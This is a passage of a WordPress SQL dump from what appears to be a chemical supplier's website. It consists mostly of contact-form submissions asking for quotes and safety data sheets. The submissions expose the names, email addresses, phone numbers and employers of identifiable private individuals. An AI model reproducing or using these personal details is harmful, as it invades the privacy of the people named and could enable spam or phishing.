;s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (32409, 3610, '_yoast_wpseo_focuskw_text_input', 'medical guidewire coatings'); 
INSERT INTO `wp_postmeta` VALUES (32410, 3610, '_yoast_wpseo_focuskw', 'medical guidewire coatings'); 
INSERT INTO `wp_postmeta` VALUES (32411, 3610, '_yoast_wpseo_title', 'Medical Guidewire Coatings | Fluoropolymer Coatings | Miller-Stephenson Medical'); 
INSERT INTO `wp_postmeta` VALUES (32412, 3610, '_yoast_wpseo_metadesc', 'Medical device manufactures utilize our Fluoropolymer Medical Guidewire Coatings offering optimized adhesion, durability, lubricity, regulatory compliance.'); 
INSERT INTO `wp_postmeta` VALUES (32413, 3610, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (32414, 3626, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32415, 3626, '_seq_num', '331'); 
INSERT INTO `wp_postmeta` VALUES (32416, 3626, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32417, 3626, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32418, 3626, '_field_1', 'Craig Michalowsky'); 
INSERT INTO `wp_postmeta` VALUES (32419, 3626, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (32420, 3626, '_field_2', 'craigmichal@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (32421, 3626, '_field_8', '(416) 656-0002'); 
INSERT INTO `wp_postmeta` VALUES (32422, 3626, '_field_3', 'DuPont krytox  for convertible, where can I buy some?'); 
INSERT INTO `wp_postmeta` VALUES (32423, 3626, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32424, 3626, '_sub_id', '3626'); 
INSERT INTO `wp_postmeta` VALUES (32425, 3627, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32426, 3627, '_seq_num', '332'); 
INSERT INTO `wp_postmeta` VALUES (32427, 3627, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32428, 3627, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32429, 3627, '_field_1', 'Steve Brunner'); 
INSERT INTO `wp_postmeta` VALUES (32430, 3627, '_field_10', 'WPC Technologies'); 
INSERT INTO `wp_postmeta` VALUES (32431, 3627, '_field_2', 'SBrunner@wpctech.com'); 
INSERT INTO `wp_postmeta` VALUES (32432, 3627, '_field_8', '(414) 559-5703'); 
INSERT INTO `wp_postmeta` VALUES (32433, 3627, '_field_3', 'I would like to know pricing and ordering information for a 5 gallon container of EPON 828 epoxy resin.\n\nThanks,\nSteve'); 
INSERT INTO `wp_postmeta` VALUES (32434, 3627, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32435, 3627, '_sub_id', '3627'); 
INSERT INTO `wp_postmeta` VALUES (32436, 3628, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32437, 3628, '_seq_num', '333'); 
INSERT INTO `wp_postmeta` VALUES (32438, 3628, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32439, 3628, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32440, 3628, '_field_1', 'PRIYA M'); 
INSERT INTO `wp_postmeta` VALUES (32441, 3628, '_field_10', 'UMAC AVIONICS PTE LIMITED'); 
INSERT INTO `wp_postmeta` VALUES (32442, 3628, '_field_2', 'tech@umacintl.com'); 
INSERT INTO `wp_postmeta` VALUES (32443, 3628, '_field_8', '(656) 846-4085'); 
INSERT INTO `wp_postmeta` VALUES (32444, 3628, '_field_3', 'Dear Sir,\r\n\r\nPlease quote for the below along with technical data sheet.\r\n\r\nSl No	Item Name	Part No	MAKE	Qty	Your Price\r\n1	URETHANE BASED CONFORMAL COATING PACK SIZE : 1GALLON	MS-472C 	MILLER-STEPHENSON	2 Nos	\r\n2	CONFORMAL COATING STRIPPER PART \r\nPACK SIZE : 1GALLON	MS-114C OR MS-115	MILLER-STEPHENSON	2 Nos	\r\n\r\n\r\nSl.\r\nNo	Special conditions	Compliance\r\n1	Date of Mfg.&amp; date of expiry should be indicated on the pack 	\r\n2	Item may have minimum 75% Shelf life at the time of supply 	\r\n3	Relevant data for extending life of the item when stored at specified temp should be submitted at the time of delivery 	\r\n4	Relevant safety data sheets should be enclosed	\r\n\r\nAlso confirm the below points\r\n1. Manufacturer Name.\r\n2. Will Manufacturer COC be provided?                                        \r\n3. Technical Datasheet/Catalog-Please attach with the reply mail.\r\n4. Delivery lead time\r\n5. EX WORKS pick up point\r\n6. Currency quoted\r\n7. IATA / Export packing charges if any:\r\n\r\n\r\nWITH REGARDS, \r\n\r\nPriya\r\nUMAC AVIONICS PTE LIMITED\r\n391B ORCHARD ROAD\r\n#23-01 NGEE ANN CITY TOWER B, \r\nSINGAPORE - 238874.\r\nTelefax : +65 68464085\r\nwww.umacintl.com\r\nEmail: tech@umacintl.com\r\n\r\n\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32445, 3628, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32446, 3628, '_sub_id', '3628'); 
INSERT INTO `wp_postmeta` VALUES (32447, 3610, '_oembed_ca18e1688de40f51afeb16452a762334', '<iframe width="1020" height="574" src="https://www.youtube.com/embed/IOGiPlCtHWg?feature=oembed" frameborder="0" allowfullscreen></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (32448, 3610, '_oembed_time_ca18e1688de40f51afeb16452a762334', '1487255427'); 
INSERT INTO `wp_postmeta` VALUES (32449, 3632, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32450, 3632, '_seq_num', '334'); 
INSERT INTO `wp_postmeta` VALUES (32451, 3632, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32452, 3632, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32453, 3632, '_field_1', 'Gio Carrillo'); 
INSERT INTO `wp_postmeta` VALUES (32454, 3632, '_field_10', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (32455, 3632, '_field_2', 'gio.carrillo@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (32456, 3632, '_field_8', '(512) 279-4027'); 
INSERT INTO `wp_postmeta` VALUES (32457, 3632, '_field_3', ' Hello,\r\n\r\nOn behalf of Lockheed Martin, I am in search of regulatory Specific Gravity, VOC, and  VOC Less Water and Exempt Solvents information for  MS-530 (DPMS-C0721A), Contact Re-Nu . I understand the product is obsolete but I though you might have the information on hand.\r\nI have the SDS, but it does not state this information that I need for reporting and cataloging. This is critical information for Lockheed Martin.\r\n\r\nThank you,\r\nGio'); 
INSERT INTO `wp_postmeta` VALUES (32458, 3632, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32459, 3632, '_sub_id', '3632'); 
INSERT INTO `wp_postmeta` VALUES (32460, 3633, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32461, 3633, '_seq_num', '335'); 
INSERT INTO `wp_postmeta` VALUES (32462, 3633, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32463, 3633, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32464, 3633, '_field_1', 'Gio Carrillo'); 
INSERT INTO `wp_postmeta` VALUES (32465, 3633, '_field_10', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (32466, 3633, '_field_2', 'gio.carrillo@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (32467, 3633, '_field_8', '(512) 279-4027'); 
INSERT INTO `wp_postmeta` VALUES (32468, 3633, '_field_3', ' Hello,\r\n\r\nOn behalf of Lockheed Martin, I am in search of regulatory Specific Gravity, VOC, and  VOC Less Water and Exempt Solvents information for  MS-783, MS-783M, DPMS U1118A1 ODC-Free Contact Re-Nu &amp; Lube.\r\nI have the SDS, but it does not state this information that I need for reporting and cataloging. This is critical information for Lockheed Martin.\r\n\r\nThank you,\r\nGio\r\n '); 
INSERT INTO `wp_postmeta` VALUES (32469, 3633, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32470, 3633, '_sub_id', '3633'); 
INSERT INTO `wp_postmeta` VALUES (32471, 3634, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32472, 3634, '_seq_num', '336'); 
INSERT INTO `wp_postmeta` VALUES (32473, 3634, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32474, 3634, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32475, 3634, '_field_1', 'Yuezhou Zhang'); 
INSERT INTO `wp_postmeta` VALUES (32476, 3634, '_field_10', 'Åbo Akademi University'); 
INSERT INTO `wp_postmeta` VALUES (32477, 3634, '_field_2', 'yuezhou.zhang@abo.fi'); 
INSERT INTO `wp_postmeta` VALUES (32478, 3634, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32479, 3634, '_field_3', 'We are interested of following products:\r\n DuPont Krytox 157-FSH (a perfluoropolyether, MW\r\n70007500) \r\n3M Novec HFE-7100 and HFE-7500\r\n\r\nPlease give us the quotation for your earliest convenience. Thanks, \r\n'); 
INSERT INTO `wp_postmeta` VALUES (32480, 3634, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32481, 3634, '_sub_id', '3634'); 
INSERT INTO `wp_postmeta` VALUES (32482, 3635, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32483, 3635, '_seq_num', '223'); 
INSERT INTO `wp_postmeta` VALUES (32484, 3635, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32485, 3635, '_field_12', 'M Larsen'); 
INSERT INTO `wp_postmeta` VALUES (32486, 3635, '_field_13', 'Trident Seafoods'); 
INSERT INTO `wp_postmeta` VALUES (32487, 3635, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32488, 3635, '_field_14', 'mlarsen@tridentseafoods.com'); 
INSERT INTO `wp_postmeta` VALUES (32489, 3635, '_field_15', '(360) 299-7013'); 
INSERT INTO `wp_postmeta` VALUES (32490, 3635, '_field_16', 'I am searching for SDS for MS-930/CO2 Safezone Contact Re-Nu- to  replace the MSDS I have on file revision date Dec 2006.'); 
INSERT INTO `wp_postmeta` VALUES (32491, 3635, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32492, 3635, '_sub_id', '3635'); 
INSERT INTO `wp_postmeta` VALUES (32493, 3610, '_oembed_1ede47a7289a5e9e57bf19ea1880fda1', '<iframe width="1020" height="574" src="https://www.youtube.com/embed/-YyTjhmKcyw?feature=oembed" frameborder="0" allowfullscreen></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (32494, 3610, '_oembed_time_1ede47a7289a5e9e57bf19ea1880fda1', '1495047213'); 
INSERT INTO `wp_postmeta` VALUES (32495, 469, '_oembed_1ede47a7289a5e9e57bf19ea1880fda1', '<iframe width="1020" height="574" src="https://www.youtube.com/embed/-YyTjhmKcyw?feature=oembed" frameborder="0" allowfullscreen></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (32496, 469, '_oembed_time_1ede47a7289a5e9e57bf19ea1880fda1', '1498438577'); 
INSERT INTO `wp_postmeta` VALUES (32497, 3638, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32498, 3638, '_seq_num', '337'); 
INSERT INTO `wp_postmeta` VALUES (32499, 3638, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32500, 3638, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32501, 3638, '_field_1', 'Jonathan Fay'); 
INSERT INTO `wp_postmeta` VALUES (32502, 3638, '_field_10', 'BASF'); 
INSERT INTO `wp_postmeta` VALUES (32503, 3638, '_field_2', 'jonathan.fay@basf.com'); 
INSERT INTO `wp_postmeta` VALUES (32504, 3638, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32505, 3638, '_field_3', 'Need an SDS for MS 143 DF\nDo not see this listed on your website.\nPlease help!\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (32506, 3638, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32507, 3638, '_sub_id', '3638'); 
INSERT INTO `wp_postmeta` VALUES (32509, 3610, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (32510, 3640, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32511, 3640, '_seq_num', '338'); 
INSERT INTO `wp_postmeta` VALUES (32512, 3640, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32513, 3640, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32514, 3640, '_field_1', 'Zayaan'); 
INSERT INTO `wp_postmeta` VALUES (32515, 3640, '_field_10', 'Hair Club For Men'); 
INSERT INTO `wp_postmeta` VALUES (32516, 3640, '_field_2', 'zchowdhury@mschem.cm'); 
INSERT INTO `wp_postmeta` VALUES (32517, 3640, '_field_8', '(203) 743-4447'); 
INSERT INTO `wp_postmeta` VALUES (32518, 3640, '_field_3', 'I&#039;m looking for the finest toupe adhesive around. As well as 500kg&#039;s of 240AZ ASAP for a special project.\n\nI&#039;m not on a client, I&#039;m president!'); 
INSERT INTO `wp_postmeta` VALUES (32519, 3640, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32520, 3640, '_sub_id', '3640'); 
INSERT INTO `wp_postmeta` VALUES (32521, 3641, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32522, 3641, '_seq_num', '339'); 
INSERT INTO `wp_postmeta` VALUES (32523, 3641, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32524, 3641, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32525, 3641, '_field_1', 'rene angwa '); 
INSERT INTO `wp_postmeta` VALUES (32526, 3641, '_field_10', 'adelelubeitngo group africa '); 
INSERT INTO `wp_postmeta` VALUES (32527, 3641, '_field_2', 'adelelubeitngo@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (32528, 3641, '_field_8', '(237) 652-4419'); 
INSERT INTO `wp_postmeta` VALUES (32529, 3641, '_field_3', 'We are adelelubeitngo group in africa we do sale and marketing engine here in Africa .we also have jobs and garages we are interesting to represent your company here thanks'); 
INSERT INTO `wp_postmeta` VALUES (32530, 3641, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32531, 3641, '_sub_id', '3641'); 
INSERT INTO `wp_postmeta` VALUES (32534, 3643, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32535, 3643, '_seq_num', '340'); 
INSERT INTO `wp_postmeta` VALUES (32536, 3643, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32537, 3643, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32538, 3643, '_field_1', 'JOHN WERNER'); 
INSERT INTO `wp_postmeta` VALUES (32539, 3643, '_field_10', 'CAD'); 
INSERT INTO `wp_postmeta` VALUES (32540, 3643, '_field_2', 'john.werner@cartactdev.com'); 
INSERT INTO `wp_postmeta` VALUES (32541, 3643, '_field_8', '(973) 369-1263'); 
INSERT INTO `wp_postmeta` VALUES (32542, 3643, '_field_3', 'Hi,\r\nIs this something you can get?  \r\nPotting Compound    EPON 828 with Versamid 125\r\nI need 2 Kits.\r\nThanks,\r\nJohn\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32543, 3643, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32544, 3643, '_sub_id', '3643'); 
INSERT INTO `wp_postmeta` VALUES (32545, 3644, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32546, 3644, '_seq_num', '224'); 
INSERT INTO `wp_postmeta` VALUES (32547, 3644, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32548, 3644, '_field_12', 'Les Smith'); 
INSERT INTO `wp_postmeta` VALUES (32549, 3644, '_field_13', 'Tool Gauge Machine works, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (32550, 3644, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32551, 3644, '_field_14', 'lsmith@toolgauge.net'); 
INSERT INTO `wp_postmeta` VALUES (32552, 3644, '_field_15', '(253) 473-2740'); 
INSERT INTO `wp_postmeta` VALUES (32553, 3644, '_field_16', 'Hi, I would like to get some guidance on which grease to use in our application. We are a  plastic injection molding company and are in need of a grease that will not dry out while at operating temperatures of 380 to 420 degrees. This would be used to lube our ejector pins and slides bushings on our injection molds.\nThank you,\nLes Smith\nSr. Process Engineer'); 
INSERT INTO `wp_postmeta` VALUES (32554, 3644, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32555, 3644, '_sub_id', '3644'); 
INSERT INTO `wp_postmeta` VALUES (32556, 3645, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32557, 3645, '_seq_num', '341'); 
INSERT INTO `wp_postmeta` VALUES (32558, 3645, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32559, 3645, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32560, 3645, '_field_1', 'Napoleon Beauvais'); 
INSERT INTO `wp_postmeta` VALUES (32561, 3645, '_field_10', 'GE Measurement &amp; Controls'); 
INSERT INTO `wp_postmeta` VALUES (32562, 3645, '_field_2', 'napoleon.beauvais@ge.com'); 
INSERT INTO `wp_postmeta` VALUES (32563, 3645, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32564, 3645, '_field_3', 'Is this part  &quot;MS-143TE&quot; ROHS compliant?\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32565, 3645, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32566, 3645, '_sub_id', '3645'); 
INSERT INTO `wp_postmeta` VALUES (32567, 3646, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32568, 3646, '_seq_num', '342'); 
INSERT INTO `wp_postmeta` VALUES (32569, 3646, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32570, 3646, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32571, 3646, '_field_1', 'PRIYA M'); 
INSERT INTO `wp_postmeta` VALUES (32572, 3646, '_field_10', 'UMAC AVIONICS PTE LIMITED'); 
INSERT INTO `wp_postmeta` VALUES (32573, 3646, '_field_2', 'tech@umacintl.com'); 
INSERT INTO `wp_postmeta` VALUES (32574, 3646, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32575, 3646, '_field_3', 'Dear Kristie,\r\n\r\nWe Thank you very much for the below quote.\r\n\r\nPlease confirm the below points.\r\n\r\nSl.\r\nNo	Special conditions	Compliance\r\n1	Date of Mfg.&amp; date of expiry should be indicated on the pack 	\r\n2	Item may have minimum 75% Shelf life at the time of supply 	\r\n3	Relevant data for extending life of the item when stored at specified temp should be submitted at the time of delivery 	\r\n4	Relevant safety data sheets should be enclosed	\r\n\r\nAlso confirm the below points\r\n1.Please confirm whether EX WORKS Pick up point is CA.\r\n2. Will Manufacturer COC be provided \r\n6. Currency quoted\r\n7. IATA / Export packing charges if any:\r\nWITH REGARDS, \r\n\r\nPriya\r\nUMAC AVIONICS PTE LIMITED\r\n391B ORCHARD ROAD\r\n#23-01 NGEE ANN CITY TOWER B, \r\nSINGAPORE - 238874.\r\nTelefax : +65 68464085\r\nwww.umacintl.com\r\nEmail: tech@umacintl.com\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32576, 3646, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32577, 3646, '_sub_id', '3646'); 
INSERT INTO `wp_postmeta` VALUES (32578, 3647, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32579, 3647, '_seq_num', '343'); 
INSERT INTO `wp_postmeta` VALUES (32580, 3647, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32581, 3647, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32582, 3647, '_field_1', 'PRIYA M'); 
INSERT INTO `wp_postmeta` VALUES (32583, 3647, '_field_10', 'UMAC AVIONICS PTE LTD'); 
INSERT INTO `wp_postmeta` VALUES (32584, 3647, '_field_2', 'TECH@UMACINTL.COM'); 
INSERT INTO `wp_postmeta` VALUES (32585, 3647, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32586, 3647, '_field_3', 'URGENT\r\nDear Sir,\r\n\r\nPlease quote for the below along with manufacturer technical data sheet and compliance matrix to the RFQ specification.\r\n\r\nSl No	Item Description	Quantity	Specification	Your Price\r\n1	META CLEAN SOLVO \r\n3000\r\n300 ML/CAN\r\nCLEANING AGENT	21	Can	\r\n\r\n\r\nSl No	Specification	Compliance\r\n1	Supplier should provide aid/arb/ard/caa/sir/taa/release note/test certificate.	\r\n2	Alternate part no (if any) should be certified by the supplier for its complete interchangability with respect to fit, form and function with certificate.	\r\n3	Shelf life of the consumable at the time of receipt should be more than 80% at its total life.	\r\n4	Material safety data sheet (MSDS) is mandatory for this item	\r\n5	Item should be supplied in individual packs with complete life details mentioned on the each pack.	\r\n\r\nPlease confirm the below points in your quote\r\nEX WORKS pick up point:\r\nCurrency : \r\nManufacturer name:\r\nManufacturer COC:\r\nDelivery period:\r\nIATA / Export packing charges if any:\r\nDate of Mfg:\r\nDate of expiry:\r\n\r\nWITH REGARDS, \r\n\r\nPriya\r\nUMAC AVIONICS PTE LIMITED\r\n391B ORCHARD ROAD\r\n#23-01 NGEE ANN CITY TOWER B, \r\nSINGAPORE - 238874.\r\nTelefax : +65 68464085\r\nwww.umacintl.com\r\nEmail: tech@umacintl.com\r\n\r\n\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32587, 3647, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32588, 3647, '_sub_id', '3647'); 
INSERT INTO `wp_postmeta` VALUES (32599, 2056, '_oembed_0efbad84f2737ba5c899a9b5fc1f14b9', '<blockquote data-secret="iEjKW0U3Re" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/product/krytox-ts4-thread-sealant/">TS4</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/product/krytox-ts4-thread-sealant/embed/#?secret=iEjKW0U3Re" data-secret="iEjKW0U3Re" width="600" height="338" title="&#8220;TS4&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (32600, 2056, '_oembed_time_0efbad84f2737ba5c899a9b5fc1f14b9', '1487349850'); 
INSERT INTO `wp_postmeta` VALUES (32601, 989, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (32602, 989, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (32604, 3659, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32605, 3659, '_seq_num', '344'); 
INSERT INTO `wp_postmeta` VALUES (32606, 3659, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32607, 3659, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32608, 3659, '_field_1', 'Peter Thomas'); 
INSERT INTO `wp_postmeta` VALUES (32609, 3659, '_field_10', 'Sublime Data Inc.'); 
INSERT INTO `wp_postmeta` VALUES (32610, 3659, '_field_2', 'peter@sublimedata.us'); 
INSERT INTO `wp_postmeta` VALUES (32611, 3659, '_field_8', '5158616600'); 
INSERT INTO `wp_postmeta` VALUES (32612, 3659, '_field_3', 'Hi,\r\n\r\nI hope you are the right person to talk about new companies interested in having business relationships with you.\r\n\r\nIf yes, then let me know the specific industry you are interested in and we will send you a sample file of companies and their contacts with complete contact information such as Business email, Phone number, Names and Mailing address etc. of each executive.\r\n\r\nThese companies and contacts index can be used for your multi-marketing initiatives as well as new customer acquisition efforts your sales teams engage in.\r\n\r\nFurther, we can validate and clean any of the marketing databases you may currently have in-house, and append additional contacts or company information that can both save you valuable time and increase your sales.\r\n\r\nI look forward to your reply.  \r\n\r\nBest,\r\n\r\nPeter Thomas | Marketing Manager'); 
INSERT INTO `wp_postmeta` VALUES (32613, 3659, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32614, 3659, '_sub_id', '3659'); 
INSERT INTO `wp_postmeta` VALUES (32615, 3660, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32616, 3660, '_seq_num', '345'); 
INSERT INTO `wp_postmeta` VALUES (32617, 3660, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32618, 3660, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32619, 3660, '_field_1', 'jane maddox'); 
INSERT INTO `wp_postmeta` VALUES (32620, 3660, '_field_10', 'sandel products'); 
INSERT INTO `wp_postmeta` VALUES (32621, 3660, '_field_2', 'jane_maddox@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (32622, 3660, '_field_8', '(310) 839-2458'); 
INSERT INTO `wp_postmeta` VALUES (32623, 3660, '_field_3', 'do you carry Hexion?  (Epon Resin 828 liquid epoxy resin).  If not, do you know where I may find it?  Looking for drum size.  Thank you. We are in California.'); 
INSERT INTO `wp_postmeta` VALUES (32624, 3660, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32625, 3660, '_sub_id', '3660'); 
INSERT INTO `wp_postmeta` VALUES (32626, 3661, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32627, 3661, '_seq_num', '346'); 
INSERT INTO `wp_postmeta` VALUES (32628, 3661, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32629, 3661, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32630, 3661, '_field_1', 'Sheila Blair'); 
INSERT INTO `wp_postmeta` VALUES (32631, 3661, '_field_10', 'Quaker Chemical'); 
INSERT INTO `wp_postmeta` VALUES (32632, 3661, '_field_2', 'blairs@quakerchem.com'); 
INSERT INTO `wp_postmeta` VALUES (32633, 3661, '_field_8', '(513) 424-3097'); 
INSERT INTO `wp_postmeta` VALUES (32634, 3661, '_field_3', 'Hello,  I am a raw material buyer with Quaker Chemical.  We are looking at a couple of Chemours Vertrel products, I was told to contact your company regarding availability and pricing.  The two products we are looking into are Vertrel C-HD and Vertrel X-DF.  We have samples from Chemours that we are currently evaluating.  Can you advise if you would be able to supply 2-3 totes per month and if so, what the price per pound might be?  Also, what would the freight terms be and where would it ship from.  All of this information is needed for me to do my cost comparisons.  It is undecided where this will ship to at this time.'); 
INSERT INTO `wp_postmeta` VALUES (32635, 3661, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32636, 3661, '_sub_id', '3661'); 
INSERT INTO `wp_postmeta` VALUES (32637, 3662, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32638, 3662, '_seq_num', '225'); 
INSERT INTO `wp_postmeta` VALUES (32639, 3662, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32640, 3662, '_field_12', 'Kyle Brossoit'); 
INSERT INTO `wp_postmeta` VALUES (32641, 3662, '_field_13', 'NSWC IHEODTD'); 
INSERT INTO `wp_postmeta` VALUES (32642, 3662, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32643, 3662, '_field_14', 'kyle.brossoit@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (32644, 3662, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (32645, 3662, '_field_16', 'I am one of engineers working for NSWC IHEODTD, and I am updating MSDSs/SDSs. From my understanding, we purchase MS-143, a release agent, from Miller-Stephenson.\n\nIf it&#039;s not a problem, could you please send a copy of the most recent version of Safety Data Sheet for MS-143? I would really appreciate it.\n\n\nSincerely,\nKyle\n\n\n\nKyle Brossoit\nEngineer\nNSWC IHEODTD\nEmail: kyle.brossoit@navy.mil\nWork #: 301-241-8992'); 
INSERT INTO `wp_postmeta` VALUES (32646, 3662, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32647, 3662, '_sub_id', '3662'); 
INSERT INTO `wp_postmeta` VALUES (32648, 3663, '_wp_attached_file', '2017/02/472C-15.pdf'); 
INSERT INTO `wp_postmeta` VALUES (32649, 3665, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32650, 3665, '_seq_num', '347'); 
